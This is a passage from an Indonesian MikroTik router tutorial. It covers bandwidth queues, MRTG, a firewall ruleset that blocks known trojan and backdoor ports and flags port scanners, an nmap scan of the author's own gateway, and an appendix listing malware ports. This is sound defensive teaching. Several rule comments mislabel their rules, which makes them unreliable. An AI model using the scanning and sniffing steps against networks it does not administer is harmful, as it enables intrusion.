  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="02" target-addresses=192.168.0.2/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="03" target-addresses=192.168.0.3/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="04" target-addresses=192.168.0.4/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="10" target-addresses=192.168.0.25/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="05" target-addresses=192.168.0.5/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="06" target-addresses=192.168.0.6/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="07" target-addresses=192.168.0.7/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="08" target-addresses=192.168.0.8/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="09" target-addresses=192.168.0.9/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="10" target-addresses=192.168.0.10/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="11" target-addresses=192.168.0.11/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="12" target-addresses=192.168.0.12/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="13" target-addresses=192.168.0.13/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="14" target-addresses=192.168.0.14/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no
add name="15" target-addresses=192.168.0.15/32 dst-address=0.0.0.0/0 \
  interface=all parent=trafikshaping priority=1 queue=default/default \
  limit-at=0/8000 max-limit=0/48000 total-queue=default disabled=no

Perintah diatas karena dalam bentuk command line, bisa juga di copy
paste, selanjutnya di paste saja ke consol mikrotiknya. ingat lihat
dulu path atau direktory aktif. Silahkan dipaste saja, kalau posisi
direktorynya di Root.

-------------------------------------------------------------------
Terminal vt102 detected, using multiline input mode
[admin@mikrotik] >
------------------------------------------------------------------

Pilihan lain metode bandwidth manajemen ini, kalau seandainya ingin
bandwidth tersebut dibagi sama rata oleh Mikrotik, seperti bandwidth
256kbps downstream dan 256kbps upstream. Sedangkan client yang akan
mengakses sebanyak 10 client, maka otomatis masing-masing client
mendapat jatah bandwidth upstream dan downstream sebanyak 256kbps
dibagi 10. Jadi masing-masing dapat 25,6kbps. Andaikata hanya 2 Client
yang mengakses maka masing-masing dapat 128kbps.

Untuk itu dipakai type PCQ (Per Connection Queue), yang bisa secara
otomatis membagi trafik per client. Tentang jenis queue di mikrotik
ini dapat dibaca pada manualnya di http://www.mikrotik.com/testdocs/
ros/2.9/root/queue.php.

Sebelumnya perlu dibuat aturan di bagian MANGLE. Seperti :

--------------------------------------------------------------------
/ip firewall mangle add chain=forward src-address=192.168.0.0/27 \
 action=mark-connection new-connection-mark=users-con
/ip firewall mangle add connection-mark=users-con action=mark-packet \
 new-packet-mark=users chain=forward
----------------------------------------------------------------------

Karena type PCQ belum ada, maka perlu ditambah, ada 2 type PCQ ini.
Pertama diberi nama pcq-download, yang akan mengatur semua trafik
melalui alamat tujuan/destination address. Trafik ini melewati
interface Local. Sehingga semua traffik download/downstream yang
datang dari jaringan 192.168.0.0/27 akan dibagi secara otomatis.

Tipe PCQ kedua, dinamakan pcq-upload, untuk mengatur semua trafik upstream
yang berasal dari alamat asal/source address. Trafik ini melewati
interface public. Sehingga semua traffik upload/upstream yang berasal
dari jaringan 192.168.0.0/27 akan dibagi secara otomatis.

Perintah:
-------------------------------------------------------------------------
/queue type add name=pcq-download kind=pcq pcq-classifier=dst-address
/queue type add name=pcq-upload kind=pcq pcq-classifier=src-address
-------------------------------------------------------------------------

Setelah aturan untuk PCQ dan Mangle ditambahkan, sekarang untuk aturan
pembagian trafiknya. Queue yang dipakai adalah Queue Tree, Yaitu:

-------------------------------------------------------------------------
/queue tree add parent=Local queue=pcq-download packet-mark=users
/queue tree add parent=Public queue=pcq-upload packet-mark=users
-------------------------------------------------------------------------

Perintah diatas mengasumsikan, kalau bandwidth yang diterima dari provider
Internet berflukstuasi atau berubah-rubah. Jika kita yakin bahwa bandwidth
yang diterima, misalkan dapat 256kbs downstream, dan 256kbps upstream, maka
ada lagi aturannya, seperti :

Untuk trafik downstreamnya :
------------------------------------------------------------------------
/queue tree add name=Download parent=Local max-limit=256k
/queue tree add parent=Download queue=pcq-download packet-mark=users
-------------------------------------------------------------------------

Dan trafik upstreamnya :
---------------------------------------------------------------------------
/queue tree add name=Upload parent=Public max-limit=256k
/queue tree add parent=Upload queue=pcq-upload packet-mark=users
---------------------------------------------------------------------------

--[10]-- Monitor MRTG via Web

Fasilitas ini diperlukan untuk monitoring trafik dalam bentuk grafik, dapat
dilihat dengan menggunakan browser. MRTG (The Multi Router Traffic Grapher)
telah dibuild sedemikian rupa, sehingga memudahkan kita memakainya. Telah
tersedia dipaket dasarnya.

Contoh konfigurasinya

-------------------------------------------------------------------------
/ tool graphing
set store-every=5min
/ tool graphing interface
add interface=all allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
---------------------------------------------------------------------------

Perintah diatas akan menampilkan grafik dari trafik yang melewati interface
jaringan baik berupa Interface Public dan Interface Local, yang dirender
setiap 5 menit sekali. Juga dapat diatur Alamat apa saja yang dapat mengakses
MRTG ini, pada parameter allow-address.

--[11]-- Keamanan di Mikrotik

Setelah beberapa Konfigurasi diatas telah disiapkan, tentu tidak lupa kita
perhatikan keamanan dari Mesin gateway Mikrotik ini, ada beberapa fasilitas
yang dipergunakan. Dalam hal ini akan dibahas tentang Firewallnya. Fasilitas
Firewall ini secara pringsip serupa dengan IP TABLES di Gnu/Linux hanya saja
beberapa perintah telah di sederhanakan namun berdaya guna.

Di Mikrotik perintah firewall ini terdapat dalam modus IP, yaitu

[admin@routerku] > /ip firewall

Terdapat beberapa packet filter seperti mangle, nat, dan filter.

-------------------------------------------------------------------------
[admin@routerku] ip firewall> ?

Firewall allows IP packet filtering on per packet basis.

.. -- go up to ip
mangle/ -- The packet marking management
nat/ -- Network Address Translation
connection/ -- Active connections
filter/ -- Firewall filters
address-list/ --
service-port/ -- Service port management
export --
--------------------------------------------------------------------------

Untuk kali ini kita akan lihat konfigurasi pada ip firewall filternya.

Karena Luasnya parameter dari firewall filter ini untuk pembahasan Firewall
Filter selengkapnya dapat dilihat pada manual mikrotik, di
http://www.mikrotik.com/testdocs/ros/2.9/ip/filter.php

Konfigurasi dibawah ini dapat memblokir beberapa Trojan, Virus, Backdoor
yang telah dikenali sebelumnya baik Nomor Port yang dipakai serta Protokolnya.
Juga telah di konfigurasikan untuk menahan Flooding dari Jaringan Publik dan
jaringan Lokal. Serta pemberian rule untuk Access control agar, Rentang
jaringan tertentu saja yang bisa melakukan Remote atau mengakses service
tertentu terhadap Mesin Mikrotik kita.

Contoh Aplikasi Filternya
-----------------------------------------------------------------------------
/ ip firewall filter
add chain=input connection-state=invalid action=drop comment="Drop Invalid \
  connections" disabled=no
add chain=input src-address=!192.168.0.0/27 protocol=tcp src-port=1024-65535 \
  dst-port=8080 action=drop comment="Block to Proxy" disabled=no
add chain=input protocol=udp dst-port=12667 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=udp dst-port=27665 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=udp dst-port=31335 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=udp dst-port=27444 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=udp dst-port=34555 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=udp dst-port=35555 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=tcp dst-port=27444 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=tcp dst-port=27665 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=tcp dst-port=31335 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=tcp dst-port=31846 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=tcp dst-port=34555 action=drop comment="Trinoo" \
  disabled=no
add chain=input protocol=tcp dst-port=35555 action=drop comment="Trinoo" \
  disabled=no
add chain=input connection-state=established action=accept comment="Allow \
  Established connections" disabled=no
add chain=input protocol=udp action=accept comment="Allow UDP" disabled=no
add chain=input protocol=icmp action=accept comment="Allow ICMP" disabled=no
add chain=input src-address=192.168.0.0/27 action=accept comment="Allow access \
  to router from known network" disabled=no
add chain=input action=drop comment="Drop anything else" disabled=no
add chain=forward protocol=tcp connection-state=invalid action=drop \
  comment="drop invalid connections" disabled=no
add chain=forward connection-state=established action=accept comment="allow \
  already established connections" disabled=no
add chain=forward connection-state=related action=accept comment="allow \
  related connections" disabled=no
add chain=forward src-address=0.0.0.0/8 action=drop comment="" disabled=no
add chain=forward dst-address=0.0.0.0/8 action=drop comment="" disabled=no
add chain=forward src-address=127.0.0.0/8 action=drop comment="" disabled=no
add chain=forward dst-address=127.0.0.0/8 action=drop comment="" disabled=no
add chain=forward src-address=224.0.0.0/3 action=drop comment="" disabled=no
add chain=forward dst-address=224.0.0.0/3 action=drop comment="" disabled=no
add chain=forward protocol=tcp action=jump jump-target=tcp comment="" \
  disabled=no
add chain=forward protocol=udp action=jump jump-target=udp comment="" \
  disabled=no
add chain=forward protocol=icmp action=jump jump-target=icmp comment="" \
  disabled=no
add chain=tcp protocol=tcp dst-port=69 action=drop comment="deny TFTP" \
  disabled=no
add chain=tcp protocol=tcp dst-port=111 action=drop comment="deny RPC \
  portmapper" disabled=no
add chain=tcp protocol=tcp dst-port=135 action=drop comment="deny RPC \
  portmapper" disabled=no
add chain=tcp protocol=tcp dst-port=137-139 action=drop comment="deny NBT" \
  disabled=no
add chain=tcp protocol=tcp dst-port=445 action=drop comment="deny cifs" \
  disabled=no
add chain=tcp protocol=tcp dst-port=2049 action=drop comment="deny NFS" \
  disabled=no
add chain=tcp protocol=tcp dst-port=12345-12346 action=drop comment="deny \
  NetBus" disabled=no
add chain=tcp protocol=tcp dst-port=20034 action=drop comment="deny NetBus" \
  disabled=no
add chain=tcp protocol=tcp dst-port=3133 action=drop comment="deny \
  BackOriffice" disabled=no
add chain=tcp protocol=tcp dst-port=67-68 action=drop comment="deny DHCP" \
  disabled=no
add chain=udp protocol=udp dst-port=69 action=drop comment="deny TFTP" \
  disabled=no
add chain=udp protocol=udp dst-port=111 action=drop comment="deny PRC \
  portmapper" disabled=no
add chain=udp protocol=udp dst-port=135 action=drop comment="deny PRC \
  portmapper" disabled=no
add chain=udp protocol=udp dst-port=137-139 action=drop comment="deny NBT" \
  disabled=no
add chain=udp protocol=udp dst-port=2049 action=drop comment="deny NFS" \
  disabled=no
add chain=udp protocol=udp dst-port=3133 action=drop comment="deny \
  BackOriffice" disabled=no
add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list \
  address-list="port scanners" address-list-timeout=2w comment="Port \
  scanners to list " disabled=no
add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg \
  action=add-src-to-address-list address-list="port scanners" \
  address-list-timeout=2w comment="NMAP FIN Stealth scan" disabled=no
add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list \
  address-list="port scanners" address-list-timeout=2w comment="SYN/FIN \
  scan" disabled=no
add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list \
  address-list="port scanners" address-list-timeout=2w comment="SYN/RST \
  scan" disabled=no
add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack \
  action=add-src-to-address-list address-list="port scanners" \
  address-list-timeout=2w comment="FIN/PSH/URG scan" disabled=no
add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg \
  action=add-src-to-address-list address-list="port scanners" \
  address-list-timeout=2w comment="ALL/ALL scan" disabled=no
add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg \
  action=add-src-to-address-list address-list="port scanners" \
  address-list-timeout=2w comment="NMAP NULL scan" disabled=no
add chain=input src-address-list="port scanners" action=drop comment="dropping \
  port scanners" disabled=no
add chain=icmp protocol=icmp icmp-options=0:0 action=accept comment="drop \
  invalid connections" disabled=no
add chain=icmp protocol=icmp icmp-options=3:0 action=accept comment="allow \
  established connections" disabled=no
add chain=icmp protocol=icmp icmp-options=3:1 action=accept comment="allow \
  already established connections" disabled=no
add chain=icmp protocol=icmp icmp-options=4:0 action=accept comment="allow \
  source quench" disabled=no
add chain=icmp protocol=icmp icmp-options=8:0 action=accept comment="allow \
  echo request" disabled=no
add chain=icmp protocol=icmp icmp-options=11:0 action=accept comment="allow \
  time exceed" disabled=no
add chain=icmp protocol=icmp icmp-options=12:0 action=accept comment="allow \
  parameter bad" disabled=no
add chain=icmp action=drop comment="deny all other types" disabled=no
add chain=tcp protocol=tcp dst-port=25 action=reject \
  reject-with=icmp-network-unreachable comment="Smtp" disabled=no
add chain=tcp protocol=udp dst-port=25 action=reject \
  reject-with=icmp-network-unreachable comment="Smtp" disabled=no
add chain=tcp protocol=tcp dst-port=110 action=reject \
  reject-with=icmp-network-unreachable comment="Smtp" disabled=no
add chain=tcp protocol=udp dst-port=110 action=reject \
  reject-with=icmp-network-unreachable comment="Smtp" disabled=no
add chain=tcp protocol=udp dst-port=110 action=reject \
  reject-with=icmp-network-unreachable comment="Smtp" disabled=no
-----------------------------------------------------------------------------

--[11.1]-- Service dan Melihat Service yang Aktif dengan PortScanner

Untuk memastikan Service apa saja yang aktif di Mesin mikrotik, perlu kita
pindai terhadap port tertentu, seandainya ada service yang tidak dibutuhkan,
sebaiknya dimatikan saja.

Untuk menonaktifkan dan mengaktifkan servise, perintah adalah :

Kita periksa dahulu service apa saja yang aktif

----------------------------------------------------------------------------------
[admin@routerku] > ip service
[admin@routerku] ip service> print
Flags: X - disabled, I - invalid
#   NAME                                  PORT  ADDRESS            CERTIFICATE
0 X telnet                                23    0.0.0.0/0       
1   ftp                                   21    0.0.0.0/0       
2   www                                   80    0.0.0.0/0       
3   ssh                                   22    0.0.0.0/0       
4   www-ssl                               443   0.0.0.0/0          none     
[admin@routerku] ip service>
----------------------------------------------------------------------------------

Misalkan service FTP akan dinonaktifkan, yaitu di daftar diatas terletak pada
nomor 1 (lihat bagian Flags) maka :

---------------------------------------------------------------------------------
[admin@routerku] ip service> set 1 disabled=yes
---------------------------------------------------------------------------------

Perlu kita periksa lagi,

---------------------------------------------------------------------------------
[admin@routerku] ip service> print
Flags: X - disabled, I - invalid
#   NAME                                  PORT  ADDRESS            CERTIFICATE
0 X telnet                                23    0.0.0.0/0       
1 X ftp                                   21    0.0.0.0/0       
2   www                                   80    0.0.0.0/0       
3   ssh                                   22    0.0.0.0/0       
4   www-ssl                               443   0.0.0.0/0          none     
[admin@router.dprd.provinsi] ip service>
---------------------------------------------------------------------------------

Sekarang service FTP telah dinonaktifkan.

Dengan memakai tool nmap kita dapat mencek port apa saja yang aktif pada mesin
gateway yang telah dikonfigurasikan.

Perintah : nmap -vv -sS -sV -P0 192.168.0.30

Hasil :

-------------------------------------------------------------------------------------
Starting Nmap 4.20 ( http://insecure.org ) at 2007-04-04 19:55 SE Asia Standard Time
Initiating ARP Ping Scan at 19:55
Scanning 192.168.0.30 [1 port]
Completed ARP Ping Scan at 19:55, 0.31s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:55
Completed Parallel DNS resolution of 1 host. at 19:55, 0.05s elapsed
Initiating SYN Stealth Scan at 19:55
Scanning  192.168.0.30 [1697 ports]
Discovered open port 22/tcp on 192.168.0.30
Discovered open port 53/tcp on 192.168.0.30
Discovered open port 80/tcp on 192.168.0.30
Discovered open port 21/tcp on 192.168.0.30
Discovered open port 3986/tcp on 192.168.0.30
Discovered open port 2000/tcp on 192.168.0.30
Discovered open port 8080/tcp on 192.168.0.30
Discovered open port 3128/tcp on 192.168.0.30
Completed SYN Stealth Scan at 19:55, 7.42s elapsed (1697 total ports)
Initiating Service scan at 19:55
Scanning 8 services on 192.168.0.30
Completed Service scan at 19:57, 113.80s elapsed (8 services on 1 host)
Host  192.168.0.30 appears to be up ... good.
Interesting ports on 192.168.0.30:
Not shown: 1689 closed ports
PORT     STATE SERVICE         VERSION
21/tcp   open  ftp             MikroTik router ftpd 2.9.27
22/tcp   open  ssh             OpenSSH 2.3.0 mikrotik 2.9.27 (protocol 1.99)
53/tcp   open  domain?
80/tcp   open  http            MikroTik router http config
2000/tcp open  callbook?
3128/tcp open  http-proxy      Squid webproxy 2.5.STABLE11
3986/tcp open  mapper-ws_ethd?
8080/tcp open  http-proxy      Squid webproxy 2.5.STABLE11
2 services unrecognized despite returning data. If you know the service/version,
please submit the following fingerprints at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :

==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=4.20%I=7%D=4/4%Time=4613A03C%P=i686-pc-windows-windows%r(D
SF:NSVersionBindReq,E,"\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0")%r(DNSStatusR
SF:equest,E,"\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2000-TCP:V=4.20%I=7%D=4/4%Time=4613A037%P=i686-pc-windows-windows%r
SF:(NULL,4,"\x01\0\0\0")%r(GenericLines,4,"\x01\0\0\0")%r(GetRequest,18,"\
SF:x01\0\0\0\x02\0\0\0d\?\xe4{\x9d\x02\x1a\xcc\x8b\xd1V\xb2F\xff9\xb0")%r(
SF:HTTPOptions,18,"\x01\0\0\0\x02\0\0\0d\?\xe4{\x9d\x02\x1a\xcc\x8b\xd1V\x
SF:b2F\xff9\xb0")%r(RTSPRequest,18,"\x01\0\0\0\x02\0\0\0d\?\xe4{\x9d\x02\x
SF:1a\xcc\x8b\xd1V\xb2F\xff9\xb0")%r(RPCCheck,18,"\x01\0\0\0\x02\0\0\0d\?\
SF:xe4{\x9d\x02\x1a\xcc\x8b\xd1V\xb2F\xff9\xb0")%r(DNSVersionBindReq,18,"\
SF:x01\0\0\0\x02\0\0\0d\?\xe4{\x9d\x02\x1a\xcc\x8b\xd1V\xb2F\xff9\xb0")%r(
SF:DNSStatusRequest,4,"\x01\0\0\0")%r(Help,4,"\x01\0\0\0")%r(X11Probe,4,"\
SF:x01\0\0\0")%r(FourOhFourRequest,18,"\x01\0\0\0\x02\0\0\0\xb9\x15&\xf1A\
SF:]\+\x11\n\xf6\x9b\xa0,\xb0\xe1\xa5")%r(LPDString,4,"\x01\0\0\0")%r(LDAP
SF:BindReq,4,"\x01\0\0\0")%r(LANDesk-RC,18,"\x01\0\0\0\x02\0\0\0\xb9\x15&\
SF:xf1A\]\+\x11\n\xf6\x9b\xa0,\xb0\xe1\xa5")%r(TerminalServer,4,"\x01\0\0\
SF:0")%r(NCP,18,"\x01\0\0\0\x02\0\0\0\xb9\x15&\xf1A\]\+\x11\n\xf6\x9b\xa0,
SF:\xb0\xe1\xa5")%r(NotesRPC,18,"\x01\0\0\0\x02\0\0\0\xb9\x15&\xf1A\]\+\x1
SF:1\n\xf6\x9b\xa0,\xb0\xe1\xa5")%r(NessusTPv10,4,"\x01\0\0\0");
MAC Address: 00:90:4C:91:77:02 (Epigram)
Service Info: Host: routerku; Device: router

Service detection performed. Please report any incorrect results at
http://insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 123.031 seconds
             Raw packets sent: 1706 (75.062KB) | Rcvd: 1722 (79.450KB)

---------------------------------------------------------------------------

Dari hasil scanning tersebut dapat kita ambil kesimpulan, bahwa service dan
port yang aktif adalah FTP dalam versi MikroTik router ftpd 2.9.27. Untuk
SSH dengan versi OpenSSH 2.3.0 mikrotik 2.9.27 (protocol 1.99). Serta Web
proxy memakai Squid dalam versi Squid webproxy 2.5.STABLE11.

Tentu saja pihak vendor mikrotik telah melakukan patch terhadap Hole atau
Vulnerabilities dari Versi Protocol diatas.

--[11.2]-- Tool administrasi Jaringan

Secara praktis terdapat beberapa tool yang dapat dimanfaatkan dalam mela
kukan troubleshooting jaringan, seperti tool ping, traceroute, SSH, dll.
Beberapa tool yang sering digunakan nantinya dalam administrasi sehari-hari
adalah :

o Telnet
o SSH
o Traceroute
o Sniffer

a. Telnet
Perintah remote mesin ini hampir sama penggunaan dengan telnet yang ada
di Linux atau Windows.

[admin@routerku] > system telnet ?

Perintah diatas untuk melihat sekilias paramater apa saja yang ada. Misalnya
mesin remote dengan ip address 192.168.0.21 dan port 23. Maka

[admin@routerku] > system telnet 192.168.0.21

Penggunaan telnet sebaiknya dibatasi untuk kondisi tertentu dengan alasan
keamanan, seperti kita ketahui, packet data yang dikirim melalui telnet
belum di enskripsi. Agar lebih amannya kita pergunakan SSH.

b. SSH
Sama dengan telnet perintah ini juga diperlukan dalam remote mesin, serta
pringsipnya sama juga parameternya dengan perintah di Linux dan Windows.

[admin@routerku] > system ssh 192.168.0.21

Parameter SSH diatas, sedikit perbedaan dengan telnet. Jika lihat helpnya
memiliki parameter tambahan yaitu user.

------------------------------------------------------------------------------
[admin@routerku] > system ssh ?
The SSH feature can be used with various SSH Telnet clients to securely connect
to and administrate the router

 --
user -- User name
port -- Port number

[admin@routerku] >
------------------------------------------------------------------------------

Misalkan kita akan melakukan remote pada suatu mesin dengan sistem
operasinya Linux, yang memiliki Account, username Root dan Password
123456 pada Address 66.213.7.30. Maka perintahnya,

-----------------------------------------------------------------------------
[admin@routerku] > system ssh 66.213.7.30 user=root
root@66.213.7.30's password:
----------------------------------------------------------------------------

c. Traceroute

Mengetahui hops atau router apa saja yang dilewati suatu packet sampai packet
itu terkirim ke tujuan, lazimnya kita menggunakan traceroute. Dengan tool ini
dapat di analisa kemana saja route dari jalannya packet.

Misalkan ingin mengetahui jalannya packet yang menuju server yahoo, maka:

----------------------------------------------------------------------------
[admin@routerku] > tool traceroute yahoo.com  ADDRESS  STATUS
 1 63.219.6.nnn    00:00:00 00:00:00 00:00:00
 2 222.124.4.nnn   00:00:00 00:00:00 00:00:00
 3 192.168.34.41   00:00:00 00:00:00 00:00:00
 4 61.94.1.253     00:00:00 00:00:00 00:00:00
 5 203.208.143.173 00:00:00 00:00:00 00:00:00
 6 203.208.182.5   00:00:00 00:00:00 00:00:00
 7 203.208.182.114 00:00:00 00:00:00 00:00:00
 8 203.208.168.118 00:00:00 00:00:00 00:00:00
 9 203.208.168.134  timeout 00:00:00 00:00:00
10 216.115.101.34  00:00:00  timeout  timeout
11 216.115.101.129  timeout  timeout 00:00:00
12 216.115.108.1    timeout  timeout 00:00:00
13 216.109.120.249 00:00:00 00:00:00 00:00:00
14 216.109.112.135 00:00:00  timeout  timeout
------------------------------------------------------------------------------

d. Sniffer

Kita dapat menangkap dan menyadap packet-packet yang berjalan
di jaringan kita, tool ini telah disediakan oleh Mikrotik yang berguna
dalam menganalisa trafik.

----------------------------------------------------------------------------
[admin@routerku] > tool sniffer
Packet sniffering

.. -- go up to tool
start -- Start/reset sniffering
stop -- Stop sniffering
save -- Save currently sniffed packets
packet/ -- Sniffed packets management
protocol/ -- Protocol management
host/ -- Host management
connection/ -- Connection management
print --
get -- get value of property
set --
edit -- edit value of property
export --
----------------------------------------------------------------------------

Untuk memulai proses sniffing dapat menggunakan perintah Start, sedangkan
menghentikannya dapat menggunaka perintah Stop.

[admin@routerku] > tool sniffer start


Proses sniffing sedang dikerjakan, tunggu saja beberapa lama, kemudian
ketikkan perintah stop jika ingin menghentikannya. Melihat hasil packet
yang ditangkap dapat menggunakan perintah print, untuk mengeksportnya
dalam bentuk file dapat digunakan perintah export.


--[12]-- Kesimpulan

Untuk pemakaian jaringan berskala Kecil-menengah produk dari Latvia ini,
dapat menjadi pilihan, saya disini bukan untuk mempromosikan Produk ini.
Namun sebagai gambaran, bagaimana memanfaatkan produk ini untuk berbagai
keperluan, lagipula sebagai alternatif dari produk sejenis yang harganya
cenderung mahal.

Dengan Mikrotik yang saat ini sedang populernya diterapkan pada berbagai
ISP Wireless, Warnet-warnet serta beberapa Perusahaan. Maka Administrasi
Sistem Jaringan dapat lebih mudah dan sederhana. Yang jelas untuk sekedar
memanfaatkan fasilitas Routing saja, PC TUA anda dapat digunakan.

Mudah-mudahan paparan diatas dapat membantu pembaca dalam memahami, apa
dan bagaimana mikrotik ini.


--[13]-- Referensi

Artikel ini merupakan kompilasi dari berbagai sumber

1. Web Blog
 - http://dhanis.web.id
 - http://okawardhana.web.id
 - http://harrychanputra.web.id

2. Website
 - http://www.cgd.co.id
 - http://www.ilmukomputer.org
 - http://www.mikrotik.com
 - http://www.mikrotik.co.id
 - http://forum.mikrotik.com


oO Using no way as a way, Using no limitations as a limitation Oo

Salam dan terimakasih,
r0t0r 
-----------------------------------------------------------------------
Copyleft Unreserved by Law 1995 - 2007 Kecoak Elektronik Indonesia
http://www.kecoak-elektronik.net



.L.A.M.P.I.R.A.N.

Daftar Port dan Protocol berbagai jenis Trojan, Backdoor, Virus.
daftar ini dapat saja tidak berlaku, atau dapat pula perlu ditambah
seiring perkembangan Malware tersebut. Update terus Filter Rule
mesin mikrotik anda.

2000 Cracks 6776 TCP
Acid Battery 32418 TCP
Acid Battery 2000 52317 TCP
Acid Shivers 10520 TCP
Agent 31 31 TCP
Agent 40421 40421 TCP
Aim Spy 777 TCP
Ajan 25 TCP
Ambush 10666 UDP
AntiGen 25 TCP
AOL Trojan 30029 TCP
Attack FTP 666 TCP
Back Construction 666/5400/5401 TCP
Back Door Setup 5000/5001/7789 TCP
Back Orifice 31337/31338 UDP
Back Orifice 2000 8787/54320/54321 TCP
Back Orifice DLL 1349 UDP
BackDoor 1999 TCP
BackDoor-G 1243/6776 TCP
BackDoor-QE 10452 TCP
BackDoor-QO 3332 TCP
BackDoor-QR 12973/12975 TCP
BackFire 31337 UDP
Baron Night 31337 TCP
Big Gluck (TN) 34324 TCP
BioNet 12349 TCP
Bla 1042/20331 TCP
Black Construction 21 TCP
Blade Runner 21/5400-5402 TCP
BO client 31337 TCP
BO Facil 5556/5557/31337 TCP
Bo Wack 31336 TCP
BoBo 4321 TCP
BOWhack 31666 TCP
BrainSpy 10101 TCP
Bubbel 5000 TCP
BugBear 36794 TCP
Bugs 2115 TCP
Bunker-Hill 61348/61603/63485 TCP
Cain e Abel 666 TCP
Chargen 9 UDP
Chupacabra 20203 TCP
Coma 10607 TCP
Cyber Attacker 9876 TCP
Dark Shadow 911 TCP
Death 2 TCP
Deep Back Orifice 31338 UDP
Deep Throat 41/2140/3150/6771 TCP
Deep Throat v2 2140/3150/6670/6711/60000 TCP
Deep Throat v3 6674 TCP
DeepBO 31337 UDP
DeepThroat 999 TCP
Delta Source 26274 UDP
Delta Source 47262 UDP
Der Spacher 3 1000/1001/2000/2001 TCP
Devil 65000 TCP
Digital RootBeer 2600 TCP
DMsetup 58/59 TCP
DNS 53 TCP
Doly Trojan 21/1010-1012/1015 TCP
Donald Dick 23476/23477 TCP
DRAT 48/50 TCP
DUN Control 12623 UDP
Eclipse 2000 3459 TCP
Eclypse 3801 UDP
Email Password Sender 25 TCP
Evil FTP 23456 TCP
Executer 80 TCP
File Nail 4567 TCP
Firehotcker 79/5321 TCP
Fore 21/50766 TCP
FTP - Trojan 21 TCP
FTP99cmp 1492 TCP
Gaban Bus 12345/12346 TCP
Gate Crasher 6969/6970 TCP
GirlFriend 21554 TCP
Gjamer 12076 TCP
Hack '99 KeyLogger 12223 TCP
Hack 'a' Tack 31780/31785/31787-31789 TCP
Hack 'a' Tack 31791/31792 UDP
HackCity Ripper Pro 2023 TCP
Hackers Paradise 31/456 TCP
HackOffice 8897 TCP
Haebu Coceda 25 TCP
Happy 99 25/119 TCP
Hidden Port 99 TCP
Hooker 80 TCP
Host Control 6669/11050 TCP
HVL Rat5 2283 TCP
icKiller 7789 TCP
ICQ (ICQ.com - community, people search and messaging service!) 1027/1029/1032 TCP
ICQ Revenge 16772/19864 TCP
ICQ Trojan 4590 TCP
Illusion Mailer 2155/5512 TCP
InCommand 9400 TCP
Indoctrination 6939 TCP
Infector 146 TCP
Infector 146 UDP
iNi-Killer 555/9989 TCP
Insane Network 2000 TCP
Invisible FTP 21 TCP
IRC-3 6969 TCP
JammerKillah 121 TCP
Kazimas 113/7000 TCP
Kuang2 25/17300/30999 TCP
Larva 21 TCP
Logged 20203 TCP
Masters' Paradise 31/3129/40421-40423/40425-40426 TCP
Mavericks Matrix 1269 TCP
